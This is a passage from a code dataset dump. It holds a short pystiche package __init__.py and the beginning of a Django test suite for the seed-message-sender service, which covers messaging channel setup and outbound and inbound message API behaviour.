| 38.60515 | 88 | 0.6806 | 2,688 | 17,990 | 4.334449 | 0.091518 | 0.118016 | 0.101708 | 0.07038 | 0.809115 | 0.784568 | 0.776843 | 0.747232 | 0.733928 | 0.707321 | 0 | 0.039477 | 0.204447 | 17,990 | 465 | 89 | 38.688172 | 0.774595 | 0.109116 | 0 | 0.591623 | 0 | 0 | 0.018702 | 0.001439 | 0 | 0 | 0 | 0 | 0.125654 | 1 | 0 | false | 0.002618 | 0.018325 | 0 | 0.018325 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
969d0b7b3a907eebe96fdcccaf31b71fb9da0988 | 63 | py | Python | pystiche/enc/models/__init__.py | dooglewoogle/pystiche | 14b61123ede2abdb00daaa5b4981de6d7edaf034 | [
"BSD-3-Clause"
] | 129 | 2019-10-04T00:23:54.000Z | 2021-04-24T06:41:37.000Z | pystiche/enc/models/__init__.py | dooglewoogle/pystiche | 14b61123ede2abdb00daaa5b4981de6d7edaf034 | [
"BSD-3-Clause"
] | 334 | 2019-10-01T08:10:44.000Z | 2021-04-25T19:39:09.000Z | pystiche/enc/models/__init__.py | dooglewoogle/pystiche | 14b61123ede2abdb00daaa5b4981de6d7edaf034 | [
"BSD-3-Clause"
] | 32 | 2021-05-05T05:06:18.000Z | 2022-03-17T09:14:47.000Z | from .alexnet import *
from .utils import *
from .vgg import *
| 15.75 | 22 | 0.714286 | 9 | 63 | 5 | 0.555556 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 63 | 3 | 23 | 21 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
96a739d34793b74351ab0a20278a16e2efba0e5b | 160,849 | py | Python | message_sender/tests.py | praekeltfoundation/seed-message-sender | d90ef4dc9fa248df97ca97f07569c6c70afcd1bd | [
"BSD-3-Clause"
] | 1 | 2017-01-03T08:53:18.000Z | 2017-01-03T08:53:18.000Z | message_sender/tests.py | praekelt/seed-message-sender | d90ef4dc9fa248df97ca97f07569c6c70afcd1bd | [
"BSD-3-Clause"
] | 45 | 2016-03-16T09:32:27.000Z | 2018-06-28T10:05:19.000Z | message_sender/tests.py | praekeltfoundation/seed-message-sender | d90ef4dc9fa248df97ca97f07569c6c70afcd1bd | [
"BSD-3-Clause"
] | 1 | 2016-09-28T09:32:05.000Z | 2016-09-28T09:32:05.000Z | import base64
import gzip
import hmac
import json
import logging
import os
import uuid
from datetime import date, datetime, timedelta
from hashlib import sha256
from unittest import mock
from unittest.mock import MagicMock, patch, call
from urllib.parse import urlencode, urlparse
import responses
from celery.exceptions import Retry
from django.conf import settings
from django.contrib.auth.models import User
from django.core.management import call_command
from django.db.models.signals import post_save
from django.test import TestCase, override_settings
from django.urls import reverse
from django.utils import timezone
from go_http.send import LoggingSender
from requests_testadapter import TestAdapter, TestSession
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.test import APIClient
from rest_hooks.models import Hook
from requests import exceptions as requests_exceptions
from seed_services_client.metrics import MetricsApiClient
from seed_message_sender.utils import load_callable
from . import tasks
from .factory import (
HttpApiSender,
HttpApiSenderException,
JunebugApiSender,
MessageClientFactory,
WassupApiSenderException,
WhatsAppApiSender,
WhatsAppApiSenderException,
)
from .models import (
AggregateOutbounds,
ArchivedOutbounds,
Channel,
IdentityLookup,
Inbound,
Outbound,
OutboundSendFailure,
)
from .serializers import OutboundArchiveSerializer
from .signals import psh_fire_msg_action_if_new
from .tasks import (
ConcurrencyLimiter,
SendMessage,
fire_metric,
requeue_failed_tasks,
send_message,
)
from .views import fire_delivery_hook
class VumiLoggingSender(LoggingSender):
def send_text(self, *args, **kwargs):
kwargs.pop("metadata", None)
return super().send_text(*args, **kwargs)
def send_image(self, to_addr, content, image_url=None):
raise HttpApiSenderException("Sending images not available on this channel.")
get_client_original = SendMessage.get_client
SendMessage.get_client = lambda x, y: VumiLoggingSender("go_http.test")
def make_channels():
vumi_channel = {
"channel_id": "VUMI_TEXT",
"channel_type": Channel.VUMI_TYPE,
"default": False,
"configuration": {
"VUMI_CONVERSATION_KEY": "conv-key",
"VUMI_ACCOUNT_KEY": "account-key",
"VUMI_ACCOUNT_TOKEN": "account-token",
"VUMI_API_URL": "http://example.com/",
},
"concurrency_limit": 1,
"message_timeout": 20,
"message_delay": 10,
}
Channel.objects.create(**vumi_channel)
vumi_channel2 = {
"channel_id": "VUMI_VOICE",
"channel_type": Channel.VUMI_TYPE,
"default": False,
"configuration": {
"VUMI_CONVERSATION_KEY": "conv-key",
"VUMI_ACCOUNT_KEY": "account-key",
"VUMI_ACCOUNT_TOKEN": "account-token",
"VUMI_API_URL": "http://example.com/",
},
"concurrency_limit": 1,
"message_timeout": 20,
"message_delay": 10,
}
Channel.objects.create(**vumi_channel2)
june_channel = {
"channel_id": "JUNE_VOICE",
"channel_type": Channel.JUNEBUG_TYPE,
"default": False,
"configuration": {
"JUNEBUG_API_URL": "http://example.com/",
"JUNEBUG_API_AUTH": ("username", "password"),
"JUNEBUG_API_FROM": "+4321",
},
"concurrency_limit": 1,
"message_timeout": 120,
"message_delay": 100,
}
Channel.objects.create(**june_channel)
june_channel2 = {
"channel_id": "JUNE_TEXT",
"channel_type": Channel.JUNEBUG_TYPE,
"default": True,
"configuration": {
"JUNEBUG_API_URL": "http://example.com/",
"JUNEBUG_API_AUTH": ("username", "password"),
"JUNEBUG_API_FROM": "+4321",
},
"concurrency_limit": 0,
"message_timeout": 0,
"message_delay": 0,
}
Channel.objects.create(**june_channel2)
june_channel2 = {
"channel_id": "JUNE_VOICE2",
"channel_type": Channel.JUNEBUG_TYPE,
"default": False,
"configuration": {
"JUNEBUG_API_URL": "http://example.com/",
"JUNEBUG_API_AUTH": ("username", "password"),
"JUNEBUG_API_FROM": "+4321",
},
"concurrency_limit": 2,
"message_timeout": 20,
"message_delay": 10,
}
Channel.objects.create(**june_channel2)
http_channel_text = {
"channel_id": "HTTP_API_TEXT",
"channel_type": Channel.HTTP_API_TYPE,
"default": False,
"configuration": {
"HTTP_API_URL": "http://example.com/",
"HTTP_API_AUTH": ("username", "password"),
"HTTP_API_FROM": "+4321",
},
"concurrency_limit": 0,
"message_timeout": 0,
"message_delay": 0,
}
Channel.objects.create(**http_channel_text)
http_channel_voice = {
"channel_id": "HTTP_API_VOICE",
"channel_type": Channel.HTTP_API_TYPE,
"default": False,
"configuration": {
"HTTP_API_URL": "http://example.com/",
"HTTP_API_AUTH": ("username", "password"),
"HTTP_API_FROM": "+4321",
},
"concurrency_limit": 2,
"message_timeout": 20,
"message_delay": 10,
}
Channel.objects.create(**http_channel_voice)
wassup_channel_text = {
"channel_id": "WASSUP_API",
"channel_type": Channel.WASSUP_API_TYPE,
"default": False,
"configuration": {
"WASSUP_API_URL": "http://example.com/",
"WASSUP_API_TOKEN": "http-api-token",
"WASSUP_API_HSM_UUID": "the-uuid",
"WASSUP_API_NUMBER": "+4321",
},
"concurrency_limit": 0,
"message_timeout": 0,
"message_delay": 0,
}
Channel.objects.create(**wassup_channel_text)
wassup_channel_text = {
"channel_id": "WASSUP_API_NON_HSM",
"channel_type": Channel.WASSUP_API_TYPE,
"default": False,
"configuration": {
"WASSUP_API_URL": "http://example.com/",
"WASSUP_API_TOKEN": "http-api-token",
"WASSUP_API_HSM_UUID": "the-uuid",
"WASSUP_API_NUMBER": "+4321",
"WASSUP_API_HSM_DISABLED": True,
},
"concurrency_limit": 0,
"message_timeout": 0,
"message_delay": 0,
}
Channel.objects.create(**wassup_channel_text)
whatsapp_channel = {
"channel_id": "WHATSAPP",
"channel_type": Channel.WHATSAPP_API_TYPE,
"default": False,
"configuration": {
"API_URL": "http://example.com/",
"API_TOKEN": "http-api-token",
"HSM_NAMESPACE": "whatsapp:hsm:test",
"HSM_ELEMENT_NAME": "test",
},
"concurrency_limit": 0,
"message_timeout": 0,
"message_delay": 0,
}
Channel.objects.create(**whatsapp_channel)
class RecordingAdapter(TestAdapter):
""" Record the request that was handled by the adapter.
"""
request = None
def send(self, request, *args, **kw):
self.request = request
return super(RecordingAdapter, self).send(request, *args, **kw)
class RecordingHandler(logging.Handler):
""" Record logs. """
logs = None
def emit(self, record):
if self.logs is None:
self.logs = []
self.logs.append(record)
class MockCache(object):
def __init__(self):
self.cache_data = {}
def get(self, key):
return self.cache_data.get(key, None)
def get_or_set(self, key, value, expire=0):
if key not in self.cache_data:
self.cache_data[key] = value
return value
return self.cache_data[key]
def add(self, key, value, expire=0):
if key not in self.cache_data:
self.cache_data[key] = value
return True
return False
def incr(self, key, value=1):
if key not in self.cache_data:
raise (ValueError)
self.cache_data[key] += value
def decr(self, key, value=1):
if key not in self.cache_data:
raise (ValueError)
self.cache_data[key] -= value
class APITestCase(TestCase):
def setUp(self):
self.client = APIClient()
self.adminclient = APIClient()
self.session = TestSession()
class AuthenticatedAPITestCase(APITestCase):
def make_outbound(
self, to_addr="+27820000123", to_identity="0c03d360", channel=None
):
if channel:
channel = Channel.objects.get(channel_id=channel)
self._replace_post_save_hooks_outbound() # don't let fixtures fire
outbound_message = {
"to_addr": to_addr,
"to_identity": to_identity,
"vumi_message_id": "075a32da-e1e4-4424-be46-1d09b71056fd",
"content": "Simple outbound message",
"delivered": False,
"attempts": 1,
"metadata": {},
"channel": channel,
}
outbound = Outbound.objects.create(**outbound_message)
self._restore_post_save_hooks_outbound() # let tests fire tasks
return str(outbound.id)
def make_inbound(self, in_reply_to, from_addr="+27820000020", from_identity=""):
inbound_message = {
"message_id": str(uuid.uuid4()),
"in_reply_to": in_reply_to,
"to_addr": "+27820000123",
"from_addr": from_addr,
"from_identity": from_identity,
"content": "Call delivered",
"transport_name": "test_voice",
"transport_type": "voice",
"helper_metadata": {},
}
inbound = Inbound.objects.create(**inbound_message)
return str(inbound.id)
def _replace_get_metric_client(self, session=None):
return MetricsApiClient(
url=settings.METRICS_URL, auth=settings.METRICS_AUTH, session=session
)
def _restore_get_metric_client(self, session=None):
return MetricsApiClient(
url=settings.METRICS_URL, auth=settings.METRICS_AUTH, session=session
)
def _replace_post_save_hooks_outbound(self):
post_save.disconnect(
psh_fire_msg_action_if_new,
sender=Outbound,
dispatch_uid="psh_fire_msg_action_if_new",
)
def _restore_post_save_hooks_outbound(self):
post_save.connect(
psh_fire_msg_action_if_new,
sender=Outbound,
dispatch_uid="psh_fire_msg_action_if_new",
)
def check_request(self, request, method, params=None, data=None, headers=None):
self.assertEqual(request.method, method)
if params is not None:
url = urlparse.urlparse(request.url)
qs = urlparse.parse_qsl(url.query)
self.assertEqual(dict(qs), params)
if headers is not None:
for key, value in headers.items():
self.assertEqual(request.headers[key], value)
if data is None:
self.assertEqual(request.body, None)
else:
self.assertEqual(json.loads(request.body), data)
def _mount_session(self):
response = [{"name": "foo", "value": 9000, "aggregator": "bar"}]
adapter = RecordingAdapter(json.dumps(response).encode("utf-8"))
self.session.mount("http://metrics-url/metrics/", adapter)
return adapter
def setUp(self):
super(AuthenticatedAPITestCase, self).setUp()
tasks.get_metric_client = self._replace_get_metric_client
self.adapter = self._mount_session()
self.username = "testuser"
self.password = "testpass"
self.user = User.objects.create_user(
self.username, "testuser@example.com", self.password
)
token = Token.objects.create(user=self.user)
self.token = token.key
self.client.credentials(HTTP_AUTHORIZATION="Token " + self.token)
self.superuser = User.objects.create_superuser(
"testsu", "su@example.com", "dummypwd"
)
sutoken = Token.objects.create(user=self.superuser)
self.adminclient.credentials(HTTP_AUTHORIZATION="Token %s" % sutoken)
self.handler = RecordingHandler()
logger = logging.getLogger("go_http.test")
logger.setLevel(logging.INFO)
logger.addHandler(self.handler)
make_channels()
def tearDown(self):
tasks.get_metric_client = self._restore_get_metric_client
def check_logs(self, msg):
if self.handler.logs is None: # nothing to check
return False
if type(self.handler.logs) != list:
[logs] = self.handler.logs
else:
logs = self.handler.logs
for log in logs:
logline = log.msg.replace("u'", "'")
if logline == msg:
return True
return False
def add_identity_search_response(self, msisdn, identity, count=1):
msisdn = msisdn.replace("+", "%2B")
results = [
{
"id": identity,
"version": 1,
"details": {
"default_addr_type": "msisdn",
"addresses": {"msisdn": {msisdn: {}}},
},
}
] * count
response = {"next": None, "previous": None, "results": results}
qs = "?details__addresses__msisdn=%s" % msisdn
responses.add(
responses.GET,
"%s/identities/search/%s" % (settings.IDENTITY_STORE_URL, qs), # noqa
json=response,
status=200,
match_querystring=True,
)
def add_create_identity_response(self, identity, msisdn):
# Setup
identity = {
"id": identity,
"version": 1,
"details": {
"default_addr_type": "msisdn",
"addresses": {"msisdn": {msisdn: {}}},
"risk": "high",
},
"communicate_through": None,
"operator": None,
"created_at": "2016-04-21T09:11:05.725680Z",
"created_by": 2,
"updated_at": "2016-06-15T15:09:05.333526Z",
"updated_by": 2,
}
responses.add(
responses.POST,
"%s/identities/" % settings.IDENTITY_STORE_URL,
json=identity,
status=201,
)
def add_metrics_response(self):
responses.add(
responses.POST, "http://metrics-url/metrics/", json={}, status=201
)
class TestWassupMessagesAPI(AuthenticatedAPITestCase):
@responses.activate
@patch("message_sender.tests.VumiLoggingSender.send_image")
def test_create_outbound_image(self, mock_send_image):
"""
When creating a outbound with a image_url in the metadata, the
send_image function should be called with the correct parameters.
"""
mock_send_image.return_value = {"message_id": str(uuid.uuid4())}
self.add_metrics_response()
self.add_identity_search_response("+27820000123", "0c03d360")
post_outbound = {
"to_addr": "+27820000123",
"delivered": "false",
"metadata": {"image_url": "https://foo.com/file.jpg"},
"channel": "WASSUP_API",
"content": "Check this image",
}
response = self.client.post(
"/api/v1/outbound/",
json.dumps(post_outbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
mock_send_image.assert_called_with(
"+27820000123", "Check this image", image_url="https://foo.com/file.jpg"
)
class TestVumiMessagesAPI(AuthenticatedAPITestCase):
def test_list_pagination_one_page(self):
outbound = self.make_outbound()
response = self.client.get("/api/v1/outbound/")
body = response.json()
self.assertEqual(len(body["results"]), 1)
self.assertEqual(body["results"][0]["id"], outbound)
self.assertIsNone(body["previous"])
self.assertIsNone(body["next"])
def test_list_pagination_two_pages(self):
outbounds = []
for i in range(3):
outbounds.append(self.make_outbound())
# Test first page
response = self.client.get("/api/v1/outbound/")
body = response.json()
self.assertEqual(len(body["results"]), 2)
self.assertEqual(body["results"][0]["id"], outbounds[2])
self.assertEqual(body["results"][1]["id"], outbounds[1])
self.assertIsNone(body["previous"])
self.assertIsNotNone(body["next"])
# Test next page
response = self.client.get(body["next"])
body = response.json()
self.assertEqual(len(body["results"]), 1)
self.assertEqual(body["results"][0]["id"], outbounds[0])
self.assertIsNotNone(body["previous"])
self.assertIsNone(body["next"])
# Test going back to previous page works
response = self.client.get(body["previous"])
body = response.json()
self.assertEqual(len(body["results"]), 2)
self.assertEqual(body["results"][0]["id"], outbounds[2])
self.assertEqual(body["results"][1]["id"], outbounds[1])
self.assertIsNone(body["previous"])
self.assertIsNotNone(body["next"])
@responses.activate
def test_create_outbound_data(self):
"""
When creating an outbound message, it should save a new Outbound
object with the correct specified values.
"""
self.add_metrics_response()
self.add_identity_search_response("+27820000123", "0c03d360")
post_outbound = {
"to_addr": "+27820000123",
"vumi_message_id": "075a32da-e1e4-4424-be46-1d09b71056fd",
"content": "Say something",
"delivered": False,
"attempts": 0,
"metadata": {},
"resend": True,
}
response = self.client.post(
"/api/v1/outbound/",
json.dumps(post_outbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Outbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.version, 1)
self.assertEqual(str(d.to_addr), "+27820000123")
self.assertEqual(str(d.to_identity), "0c03d360")
self.assertEqual(d.content, "Say something")
self.assertEqual(d.delivered, False)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata, {})
self.assertEqual(d.resend, True)
@responses.activate
def test_create_outbound_data_simple(self):
"""
When creating a new outbound message, leaving out the optional fields
in the request should still create an Outbound object.
"""
self.add_metrics_response()
self.add_identity_search_response("+27820000123", "0c03d360")
post_outbound = {
"to_addr": "+27820000123",
"delivered": "false",
"metadata": {"voice_speech_url": "https://foo.com/file.mp3"},
}
response = self.client.post(
"/api/v1/outbound/",
json.dumps(post_outbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Outbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.version, 1)
self.assertEqual(str(d.to_addr), "+27820000123")
self.assertEqual(str(d.to_identity), "0c03d360")
self.assertEqual(d.delivered, False)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata, {"voice_speech_url": "https://foo.com/file.mp3"})
self.assertEqual(d.channel, None)
@responses.activate
def test_create_outbound_data_new_identity(self):
"""
When creating a new outbound message, if the identity is not supplied,
and the identity does not exist in the identity store, a new identity
should be created on the identity store for that address.
"""
self.add_metrics_response()
self.add_identity_search_response("+27820012345", None, 0)
self.add_create_identity_response("0c03d360123", "+27820012345")
post_outbound = {
"to_addr": "+27820012345",
"delivered": "false",
"metadata": {"voice_speech_url": "https://foo.com/file.mp3"},
}
response = self.client.post(
"/api/v1/outbound/",
json.dumps(post_outbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Outbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.version, 1)
self.assertEqual(str(d.to_addr), "+27820012345")
self.assertEqual(str(d.to_identity), "0c03d360123")
self.assertEqual(d.delivered, False)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata, {"voice_speech_url": "https://foo.com/file.mp3"})
self.assertEqual(d.channel, None)
create_id_post = responses.calls[1]
self.assertEqual(
json.loads(create_id_post.request.body),
{
"details": {
"default_addr_type": "msisdn",
"addresses": {"msisdn": {"+27820012345": {"default": True}}},
}
},
)
@responses.activate
def test_create_outbound_data_with_channel(self):
"""
When creating an outbound message, if the channel is specified, then
that Outbound should have the specified channel.
"""
self.add_metrics_response()
self.add_identity_search_response("+27820000123", "0c03d360")
post_outbound = {
"to_addr": "+27820000123",
"delivered": "false",
"metadata": {"voice_speech_url": "https://foo.com/file.mp3"},
"channel": "JUNE_TEXT",
}
response = self.client.post(
"/api/v1/outbound/",
json.dumps(post_outbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Outbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.version, 1)
self.assertEqual(str(d.to_addr), "+27820000123")
self.assertEqual(str(d.to_identity), "0c03d360")
self.assertEqual(d.delivered, False)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata, {"voice_speech_url": "https://foo.com/file.mp3"})
self.assertEqual(d.channel.channel_id, "JUNE_TEXT")
def test_create_outbound_data_with_channel_unknown(self):
post_outbound = {
"to_addr": "+27820000123",
"delivered": "false",
"metadata": {"voice_speech_url": "https://foo.com/file.mp3"},
"channel": "JUNE_VOICE_TEST",
}
response = self.client.post(
"/api/v1/outbound/",
json.dumps(post_outbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_outbound_without_recipient(self):
post_outbound = {"delivered": "false", "metadata": {}}
response = self.client.post(
"/api/v1/outbound/",
json.dumps(post_outbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@responses.activate
def test_create_outbound_identity_only(self):
"""
When only the identity UUID is specified, the resulting created
Outbound object should have the address that was looked up from the
identity store on it.
"""
self.add_metrics_response()
uid = "test-test-test-test"
# mock identity address lookup
responses.add(
responses.GET,
"%s/identities/%s/addresses/msisdn?default=True&use_communicate_through=True"
% (settings.IDENTITY_STORE_URL, uid), # noqa
json={
"next": None,
"previous": None,
"results": [{"address": "+26773000000"}],
},
status=200,
content_type="application/json",
match_querystring=True,
)
post_outbound = {"to_identity": uid, "delivered": "false", "metadata": {}}
response = self.client.post(
"/api/v1/outbound/",
json.dumps(post_outbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Outbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.version, 1)
self.assertEqual(d.to_addr, "+26773000000")
self.assertEqual(d.to_identity, uid)
self.assertEqual(d.delivered, False)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata, {})
self.assertEqual(d.channel, None)
def test_update_outbound_data(self):
existing = self.make_outbound()
patch_outbound = {"delivered": "true", "attempts": 2}
response = self.client.patch(
"/api/v1/outbound/%s/" % existing,
json.dumps(patch_outbound),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=existing)
self.assertEqual(d.version, 1)
self.assertEqual(str(d.to_addr), "+27820000123")
self.assertEqual(d.delivered, True)
self.assertEqual(d.attempts, 2)
def test_delete_outbound_data(self):
existing = self.make_outbound()
response = self.client.delete(
"/api/v1/outbound/%s/" % existing, content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
d = Outbound.objects.filter(id=existing).count()
self.assertEqual(d, 0)
def test_created_at_filter_outbound_exists(self):
existing = Outbound.objects.get(pk=self.make_outbound())
response = self.client.get(
"/api/v1/outbound/?%s"
% (
urlencode(
{
"before": (existing.created_at + timedelta(days=1)).isoformat(),
"after": (existing.created_at - timedelta(days=1)).isoformat(),
}
)
)
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data["results"]), 1)
self.assertEqual(response.data["results"][0]["id"], str(existing.id))
def test_created_at_filter_outbound_not_exists(self):
existing = Outbound.objects.get(pk=self.make_outbound())
response = self.client.get(
"/api/v1/outbound/?%s"
% (
urlencode(
{
"before": (existing.created_at - timedelta(days=1)).isoformat(),
"after": (existing.created_at + timedelta(days=1)).isoformat(),
}
)
)
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data["results"], [])
def test_to_addr_filter_outbound(self):
"""
When filtering on to_addr, only the outbound with the specified to
address should be returned.
"""
self.make_outbound(to_addr="+1234")
self.make_outbound(to_addr="+4321")
response = self.client.get(
"/api/v1/outbound/?{}".format(urlencode({"to_addr": "+1234"}))
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data["results"]), 1)
def test_to_addr_filter_outbound_multiple(self):
"""
When filtering on to_addr, if multiple values are presented for the
to address, we should return all outbound messages that match one of
the to addresses.
"""
self.make_outbound(to_addr="+1234")
self.make_outbound(to_addr="+4321")
self.make_outbound(to_addr="+1111")
response = self.client.get(
"/api/v1/outbound/?{}".format(
urlencode((("to_addr", "+1234"), ("to_addr", "+4321")))
)
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data["results"]), 2)
def test_to_identity_filter_outbound(self):
"""
When filtering on to_identity, only outbound messages with that
identity id should be returned.
"""
self.make_outbound(to_identity="1234")
self.make_outbound(to_identity="4321")
response = self.client.get(
"/api/v1/outbound/?{}".format(urlencode((("to_identity", "1234"),)))
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data["results"]), 1)
def test_to_identity_filter_outbound_multiple(self):
"""
When filtering on to_identity, if multiple values are presented for the
identity ID, we should return all outbound messages that match one of
the identity IDs.
"""
self.make_outbound(to_identity="1234")
self.make_outbound(to_identity="4321")
self.make_outbound(to_identity="1111")
response = self.client.get(
"/api/v1/outbound/?{}".format(
urlencode((("to_identity", "1234"), ("to_identity", "4321")))
)
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data["results"]), 2)
def test_created_at_ordering_filter_outbound(self):
"""
We should be able to order the results of the Outbound list endpoint
by the created_at timestamp.
"""
out1 = self.make_outbound()
out2 = self.make_outbound()
response = self.client.get(
"/api/v1/outbound/?{}".format(urlencode({"ordering": "created_at"}))
)
self.assertEqual([o["id"] for o in response.data["results"]], [out1, out2])
response = self.client.get(
"/api/v1/outbound/?{}".format(urlencode({"ordering": "-created_at"}))
)
self.assertEqual([o["id"] for o in response.data["results"]], [out2, out1])
def test_from_addr_filter_inbound(self):
"""
When filtering on from_addr, only the inbounds with the specified from
address should be returned.
"""
self.make_inbound("1234", from_addr="+1234")
self.make_inbound("1234", from_addr="+4321")
response = self.client.get(
"/api/v1/inbound/?{}".format(urlencode({"from_addr": "+1234"}))
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data["results"]), 1)
def test_from_addr_filter_inbound_multiple(self):
"""
When filtering on from_addr, if multiple values are presented for the
from address, we should return all inbound messages that match one of
the from addresses.
"""
self.make_inbound("1234", from_addr="+1234")
self.make_inbound("1234", from_addr="+4321")
self.make_inbound("1234", from_addr="+1111")
response = self.client.get(
"/api/v1/inbound/?{}".format(
urlencode((("from_addr", "+1234"), ("from_addr", "+4321")))
)
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data["results"]), 2)
def test_from_identity_filter_inbound(self):
"""
When filtering on from_identity, only the inbounds with the specified
identity ID should be returned.
"""
self.make_inbound("1234", from_identity="1234")
self.make_inbound("1234", from_identity="4321")
response = self.client.get(
"/api/v1/inbound/?{}".format(urlencode({"from_identity": "1234"}))
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data["results"]), 1)
def test_from_identity_filter_inbound_multiple(self):
"""
When filtering on from_identity, if multiple values are presented for
the from identity IDs, we should return all inbound messages that match
one of the from identity IDs.
"""
self.make_inbound("1234", from_identity="1234")
self.make_inbound("1234", from_identity="4321")
self.make_inbound("1234", from_identity="1111")
response = self.client.get(
"/api/v1/inbound/?{}".format(
urlencode((("from_identity", "1234"), ("from_identity", "4321")))
)
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data["results"]), 2)
def test_created_at_ordering_filter_inbound(self):
"""
We should be able to order the results of the Inbound list endpoint
by the created_at timestamp.
"""
in1 = self.make_inbound("1234")
in2 = self.make_inbound("1234")
response = self.client.get(
"/api/v1/inbound/?{}".format(urlencode({"ordering": "created_at"}))
)
self.assertEqual([i["id"] for i in response.data["results"]], [in1, in2])
response = self.client.get(
"/api/v1/inbound/?{}".format(urlencode({"ordering": "-created_at"}))
)
self.assertEqual([i["id"] for i in response.data["results"]], [in2, in1])
@responses.activate
def test_create_inbound_data_no_limit(self):
"""
When there is no concurrency limit set, then for inbound messages,
the concurrency limiter should not decrement.
"""
self.add_metrics_response()
self.add_identity_search_response("+27820000020", "0c03d360")
existing_outbound = self.make_outbound()
out = Outbound.objects.get(pk=existing_outbound)
message_id = str(uuid.uuid4())
post_inbound = {
"message_id": message_id,
"in_reply_to": out.vumi_message_id,
"to_addr": "+27820000123",
"from_addr": "+27820000020",
"content": "Call delivered",
"transport_name": "test_voice",
"transport_type": "voice",
"helper_metadata": {},
}
with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
response = self.client.post(
"/api/v1/inbound/VUMI_TEXT/",
json.dumps(post_inbound),
content_type="application/json",
)
mock_method.assert_not_called()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Inbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.message_id, message_id)
self.assertEqual(d.to_addr, "+27820000123")
self.assertEqual(d.from_addr, "")
self.assertEqual(d.from_identity, "0c03d360")
self.assertEqual(d.content, "Call delivered")
self.assertEqual(d.transport_name, "test_voice")
self.assertEqual(d.transport_type, "voice")
self.assertEqual(d.helper_metadata, {})
@responses.activate
def test_create_inbound_data_unknown_msisdn(self):
"""
When there is an inbound message created, with an msisdn that doesn't
exist in the identity store, we should create a new identity for that
address in the identity store.
"""
self.add_metrics_response()
self.add_identity_search_response("+27820000020", "0c03d360", 0)
self.add_create_identity_response("0c03d360", "+27820000020")
existing_outbound = self.make_outbound()
out = Outbound.objects.get(pk=existing_outbound)
message_id = str(uuid.uuid4())
post_inbound = {
"message_id": message_id,
"in_reply_to": out.vumi_message_id,
"to_addr": "+27820000123",
"from_addr": "+27820000020",
"content": "Call delivered",
"transport_name": "test_voice",
"transport_type": "voice",
"helper_metadata": {},
}
with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
response = self.client.post(
"/api/v1/inbound/VUMI_TEXT/",
json.dumps(post_inbound),
content_type="application/json",
)
mock_method.assert_not_called()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Inbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.message_id, message_id)
self.assertEqual(d.to_addr, "+27820000123")
self.assertEqual(d.from_addr, "")
self.assertEqual(d.from_identity, "0c03d360")
self.assertEqual(d.content, "Call delivered")
self.assertEqual(d.transport_name, "test_voice")
self.assertEqual(d.transport_type, "voice")
self.assertEqual(d.helper_metadata, {})
@responses.activate
def test_create_inbound_data_with_channel_vumi(self):
"""
When we create an inbound message, the specific channel that the
URL is linked to should be set on the message.
"""
self.add_metrics_response()
self.add_identity_search_response("+27820000020", "0c03d360")
existing_outbound = self.make_outbound()
out = Outbound.objects.get(pk=existing_outbound)
out.last_sent_time = out.created_at
out.save()
message_id = str(uuid.uuid4())
post_inbound = {
